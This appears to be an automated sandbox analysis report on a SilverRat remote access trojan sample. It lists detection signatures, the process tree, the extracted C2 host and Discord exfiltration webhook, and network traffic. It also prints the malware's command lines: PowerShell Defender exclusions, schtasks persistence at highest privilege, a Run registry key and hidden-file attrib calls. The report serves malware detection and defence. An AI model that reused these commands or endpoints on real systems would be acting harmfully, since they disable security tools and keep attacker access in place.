
Windows Analysis Report
RLesaPFXew.exe

Overview

General Information

Sample name: RLesaPFXew.exe (renamed because original name is a hash value)
Original sample name: aa80b2971f14c91c4a09162357188bf73d0f9934.exe
Analysis ID: 1552938
MD5: 537b270c2278044e4c3958530f745ece
SHA1: aa80b2971f14c91c4a09162357188bf73d0f9934
SHA256: 3147922611475a9c92e23a018bf666a4890f2c3aa159b235883beff80cffb71a
Tags: exe, silverrat, user-NDA0E

Detection

SilverRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected SilverRat
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys to launch java
Exploit detected, runtime environment starts unknown processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • RLesaPFXew.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\RLesaPFXew.exe" MD5: 537B270C2278044E4C3958530F745ECE)
    • attrib.exe (PID: 6404 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2192 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6068 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5692 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • $77java.exe (PID: 2940 cmdline: "C:\Users\user\java\$77java.exe" MD5: 537B270C2278044E4C3958530F745ECE)
        • schtasks.exe (PID: 5704 cmdline: "schtasks.exe" /query /TN $77java.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7012 cmdline: "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1864 cmdline: "schtasks.exe" /query /TN $77java.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 6252 cmdline: "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • $77java.exe (PID: 3000 cmdline: C:\Users\user\java\$77java.exe "\$77java.exe" /AsAdmin MD5: 537B270C2278044E4C3958530F745ECE)
  • cleanup
{"Mutex": "SilverMutex_vhcVsDtDDi", "Host": "23.ip.gl.ply.gg", "Port": "52996", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0"}
Source | Rule | Description | Author | Strings
RLesaPFXew.exe | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security
C:\Users\user\java\$77java.exe | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security
00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security
00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security
Process Memory Space: RLesaPFXew.exe PID: 5576 | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security
0.0.RLesaPFXew.exe.1d0000.0.unpack | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security
0.2.RLesaPFXew.exe.3af8618.0.unpack | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security
0.2.RLesaPFXew.exe.3af8618.0.raw.unpack | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\java\$77java.exe", ParentImage: C:\Users\user\java\$77java.exe, ParentProcessId: 2940, ParentProcessName: $77java.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 616, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\java\$77java.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RLesaPFXew.exe, ProcessId: 5576, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\java\$77java.exe", ParentImage: C:\Users\user\java\$77java.exe, ParentProcessId: 2940, ParentProcessName: $77java.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 616, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\java\$77java.exe", ParentImage: C:\Users\user\java\$77java.exe, ParentProcessId: 2940, ParentProcessName: $77java.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 616, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-09T22:53:23.175080+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.6 | 49745 | TCP
2024-11-09T22:53:50.697780+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.6 | 60572 | TCP

AV Detection

Source: RLesaPFXew.exe | Avira: detected
Source: 23.ip.gl.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\java\$77java.exe | Avira: detection malicious, Label: HEUR/AGEN.1313050
Source: RLesaPFXew.exe | Malware Configuration Extractor: SilverRat {"Mutex": "SilverMutex_vhcVsDtDDi", "Host": "23.ip.gl.ply.gg", "Port": "52996", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0"}
Source: C:\Users\user\java\$77java.exe | ReversingLabs: Detection: 65%
Source: RLesaPFXew.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\java\$77java.exe | Joe Sandbox ML: detected
Source: RLesaPFXew.exe | Joe Sandbox ML: detected
Source: RLesaPFXew.exe | String decryptor: -|S.S.S|-
Source: RLesaPFXew.exe | String decryptor: 23.ip.gl.ply.gg
Source: RLesaPFXew.exe | String decryptor: 52996
Source: RLesaPFXew.exe | String decryptor: https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0
Source: RLesaPFXew.exe | String decryptor: https://g.top4top.io/p_2522c7w8u1.png
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: RLesaPFXew.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Software Vulnerabilities

Source: C:\Users\user\java\$77java.exe | Process created: C:\Windows\System32\schtasks.exe

Networking

Source: Malware configuration extractor | URLs: 23.ip.gl.ply.gg
Source: global traffic | TCP traffic: 192.168.2.6:49711 -> 147.185.221.23:52996
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0 HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: discordapp.com | Content-Length: 415 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 147.185.221.23 147.185.221.23
Source: Joe Sandbox View | IP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox View | IP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox View | ASN Name: SALSGIVERUS SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49745
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:60572
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: discordapp.com
Source: global traffic | DNS traffic detected: DNS query: 23.ip.gl.ply.gg
Source: unknown | HTTP traffic detected: POST /api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0 HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: discordapp.com | Content-Length: 415 | Expect: 100-continue | Connection: Keep-Alive
Source: $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: $77java.exe, 0000000D.00000002.3389411382.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discordapp.com
Source: $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co4yL
Source: RLesaPFXew.exe, 00000000.00000002.2158375099.0000000003621000.00000004.00000800.00020000.00000000.sdmp, $77java.exe, 0000000D.00000002.3389411382.0000000003689000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: $77java.exe, 0000000D.00000002.3389411382.00000000039CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discordapp.com
Source: $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4
Source: $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.top4top.io/p_2522c7w8u
Source: $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.top4top.io/p_2522c7w8u1.png
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49710 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: RLesaPFXew.exe, type: SAMPLE
Source: Yara match | File source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\java\$77java.exe, type: DROPPED
Source: RLesaPFXew.exe, Keyloaggr.cs | .Net Code: KeyboardLayout
Source: $77java.exe.0.dr, Keyloaggr.cs | .Net Code: KeyboardLayout
Source: C:\Users\user\Desktop\RLesaPFXew.exe | Code function: 0_2_00007FFD34697C15 NtSetValueKey, 0_2_00007FFD34697C15
Source: C:\Users\user\Desktop\RLesaPFXew.exe | Code function: 0_2_00007FFD34697C79 NtSetValueKey, 0_2_00007FFD34697C79
Source: C:\Users\user\Desktop\RLesaPFXew.exe | Code function: 0_2_00007FFD346960C2 0_2_00007FFD346960C2
Source: C:\Users\user\Desktop\RLesaPFXew.exe | Code function: 0_2_00007FFD34691958 0_2_00007FFD34691958
Source: C:\Users\user\Desktop\RLesaPFXew.exe | Code function: 0_2_00007FFD34695316 0_2_00007FFD34695316
Source: C:\Users\user\java\$77java.exe | Code function: 13_2_00007FFD346860C2 13_2_00007FFD346860C2
Source: C:\Users\user\java\$77java.exe | Code function: 13_2_00007FFD34681910 13_2_00007FFD34681910
Source: C:\Users\user\java\$77java.exe | Code function: 13_2_00007FFD346818E8 13_2_00007FFD346818E8
Source: C:\Users\user\java\$77java.exe | Code function: 13_2_00007FFD34685316 13_2_00007FFD34685316
Source: RLesaPFXew.exe | Static PE information: No import functions for PE file found
Source: $77java.exe.0.dr | Static PE information: No import functions for PE file found
Source: RLesaPFXew.exe, 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEverything.exe4 vs RLesaPFXew.exe
Source: RLesaPFXew.exe, 00000000.00000000.2129580710.00000000001DE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameEverything.exe4 vs RLesaPFXew.exe
Source: RLesaPFXew.exe | Binary or memory string: OriginalFilenameEverything.exe4 vs RLesaPFXew.exe
Source: RLesaPFXew.exe, Settings.cs | Cryptographic APIs: 'CreateDecryptor'
Source: $77java.exe.0.dr, Settings.cs | Cryptographic APIs: 'CreateDecryptor'
Source: RLesaPFXew.exe, Settings.cs | Task registration methods: 'CreateShTasks'
Source: $77java.exe.0.dr, Settings.cs | Task registration methods: 'CreateShTasks'
Source: RLesaPFXew.exe, Settings.cs | Base64 encoded string: 'MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==', 'XX4Iz5kAK/EAkTqnGs7iFMG9nBFshn90zyvdo/rg7Bn+3lPgEwqvKSsalPTz/JNq'
Source: RLesaPFXew.exe, Installation.cs | Base64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
Source: RLesaPFXew.exe, MessageRead.cs | Base64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
Source: $77java.exe.0.dr, Settings.cs | Base64 encoded string: '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', 'XX4Iz5kAK/EAkTqnGs7iFMG9nBFshn90zyvdo/rg7Bn+3lPgEwqvKSsalPTz/JNq'
Source: $77java.exe.0.dr, Installation.cs | Base64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
Source: $77java.exe.0.dr, MessageRead.cs | Base64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
                  Source: $77java.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: $77java.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: RLesaPFXew.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: RLesaPFXew.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@32/10@2/2
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile created: C:\Users\user\javaJump to behavior
                  Source: C:\Users\user\java\$77java.exeMutant created: NULL
                  Source: C:\Users\user\java\$77java.exeMutant created: \Sessions\1\BaseNamedObjects\SilverMutex_vhcVsDtDDi
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4B52.tmpJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""
                  Source: RLesaPFXew.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: RLesaPFXew.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RLesaPFXew.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile read: C:\Users\user\Desktop\RLesaPFXew.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\RLesaPFXew.exe "C:\Users\user\Desktop\RLesaPFXew.exe"
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\java\$77java.exe "C:\Users\user\java\$77java.exe"
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\java\$77java.exe C:\Users\user\java\$77java.exe "\$77java.exe" /AsAdmin
